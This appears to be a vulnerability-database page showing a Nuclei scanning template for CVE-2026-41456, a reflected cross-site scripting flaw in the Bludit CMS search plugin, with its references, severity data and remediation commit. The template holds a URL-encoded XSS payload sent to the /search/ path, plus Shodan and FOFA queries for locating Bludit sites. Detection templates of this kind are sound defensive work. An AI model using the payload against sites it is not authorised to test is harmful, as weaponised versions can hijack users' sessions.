Bludit CMS <= 3.20.0 - Cross-Site Scripting
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2026-41456 | 21 Apr 202618:03 | – | attackerkb | |
| Bludit 跨站脚本漏洞 | 21 Apr 202600:00 | – | cnnvd | |
| CVE-2026-41456 | 21 Apr 202618:03 | – | cve | |
| CVE-2026-41456 Bludit CMS Reflected XSS via Search Plugin | 21 Apr 202618:03 | – | cvelist | |
| Bludit CMS 3.20.0 - Reflected Cross-Site Scripting | 2 Sep 202600:00 | – | exploitdb | |
| EUVD-2026-24239 | 21 Apr 202621:31 | – | euvd | |
| CVE-2026-41456 | 21 Apr 202619:16 | – | nvd | |
| Bludit CMS 3.20.0 Cross Site Scripting | 3 Sep 202600:00 | – | packetstorm | |
| PT-2026-34045 | 21 Apr 202600:00 | – | ptsecurity | |
| CVE-2026-41456 | 12 May 202602:27 | – | redhatcve |
10
id: CVE-2026-41456
info:
name: Bludit CMS <= 3.20.0 - Cross-Site Scripting
author: 0x_Akoko
severity: medium
description: |
Bludit CMS contains a reflected XSS caused by improper sanitization in the search plugin, letting unauthenticated attackers inject arbitrary JavaScript, exploit requires crafted malicious search query.
impact: |
Attackers can execute malicious scripts in users' browsers, potentially stealing session cookies or performing actions on their behalf.
remediation: |
Update to the version including commit 6732dde or later.
reference:
- https://github.com/bludit/bludit/commit/6732ddedda8b73ce0a017a1b6adf685100244e01
- https://gist.github.com/thepiyushkumarshukla/36b213cdb3c7d603e23fd23605cd681e
- https://nvd.nist.gov/vuln/detail/CVE-2026-41456
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2026-41456
epss-score: 0.01243
epss-percentile: 0.67462
cwe-id: CWE-79
metadata:
verified: true
max-request: 2
vendor: bludit
product: bludit
shodan-query: http.html:"Bludit"
fofa-query: body="Powered by Bludit" || body="bludit.com"
tags: cve,cve2026,bludit,xss,cms
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_any(tolower(body), "powered by bludit", "content=\"bludit\"", "bl-kernel")'
condition: and
internal: true
- raw:
- |
GET /search/%22%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E.gif HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_any(tolower(body), "bludit")'
- 'contains(body, "onerror=alert(document.domain)>")'
condition: and
# digest: 4a0a0047304502203525457024dfa6bf671c40e0f10651a63172b357704c0dc00f407b778cd8ebfb02210082a7b11577a65343f1bb9e46382419502e21d34b9ddd53934eb8c655a4fb4376:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Sep 2026 01:18Current
CVSS 45.1
EPSS0.01243
SSVC